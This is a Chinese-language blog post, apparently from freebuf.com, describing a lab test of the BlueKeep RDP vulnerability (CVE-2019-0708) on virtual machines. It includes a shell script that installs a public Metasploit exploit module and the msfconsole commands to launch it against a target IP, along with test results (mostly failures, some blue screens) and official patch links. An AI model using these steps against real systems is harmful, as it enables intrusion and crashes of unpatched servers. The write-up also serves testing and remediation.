一、漏洞描述
Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广如:windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。
二、漏洞利用方法
为了测试方便,直接扔出自编的一个脚本,按下面步骤做就可以,使用kali linxu系统。
1. 建立一个脚本文件*.sh,同时chmod +x *.sh付给它可执行属性
2. 直接复制如下代码到*.sh,然后./*.sh运行即可准备好攻击环境(注意:脚本帮助更新了MSF,这一步是必须的!不然框架加载不进来)
#Update your MSF apt-get update apt-get install metasploit-framework #Download cve-2019-0708 git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce.git #Mkdir for cve mkdir –p /usr/share/metasploit-framework/lib/msf/core/exploit/ mkdir –p /usr/share/metasploit-framework/modules/auxiliary/scanner/ mkdir –p /usr/share/metasploit-framework/modules/exploits/windows/rdp/ mkdir –p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/ #Copy .rb to target dir cd cve_2019_0708_bluekeep_rce/ cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/ cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/ cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/ cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
CVE-2019-0708下载后包含2个模块,一个扫描模块cve_2019_0708_bluekeep,一个攻击模块cve_2019_0708_bluekeep_rce,直接使用攻击模块就可以。
3. 继续如下操作即可开始测试
msfconsole
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.80.111(目标IP)
set target 3(目标环境,具体用哪个看下面第二个图,或者直接在模块下输入info就行)
run
三、开始测试(系统都是虚拟机)
1. 测试winxp-sp3
可以,XP岿然不动,稳如泰山!虽然没打几个补丁,但是一点都不虚!
2. 测试win7-x64-sp1
稳如……难道这就是现实?一点也打不动……
3. 测试server2008-x64-R2-SP1
可以的,不但没有拿到shell,还打蓝屏了,换了一个参数,打成了无响应……
4. 测试server-2003-企业版
打不动……好像知道了一点事情……
5. 测试win10-x64专业版
当然要拿自己的机器试一下,一样没打补丁,完全打不动。
四、 写在最后
本次测试虽然没有成功复现,但是折腾之后想起来一个词“水土不服”,曾经折腾过很多渗透测试,都是因为水土不服——只有找到特定的系统,做特定的配置才能复现,有的甚至要配置特定的系统语言。
其实本次CVE也要在2008R2上配置一些东西才能通过,但是距离真实环境太远,就没去配置,原汁原味测试一下就好啦,还有……渗透测试建议不要用这个,蓝屏谁也受不了!
附:—————— 漏洞补丁下载————————
其实用你的杀毒软件直接更新漏洞补丁更快!
1.Windows Server 2008漏洞补丁系列下载地址
Windows Server 200832位系统:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu
Windows Server 2008x64位系统:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu
Windows Server 2008R2 Itanium系统:
http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu
Windows Server 2008R2 x64系统:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49***cb.msu
Windows Server 2008Itanium:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu
2.Windows Server 2003漏洞补丁系列下载地址
Windows Server 200332位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe
Windows Server 200364位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe
3. Windows XP 漏洞补丁系列下载地址
Windows XP SP3 32位系统:
http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe
Windows XP SP2 64位系统:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe
Windows XP SP3 forXPe:
http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe
来源:freebuf.com 2019-09-13 02:40:22 by: Rname红名
请登录后发表评论
注册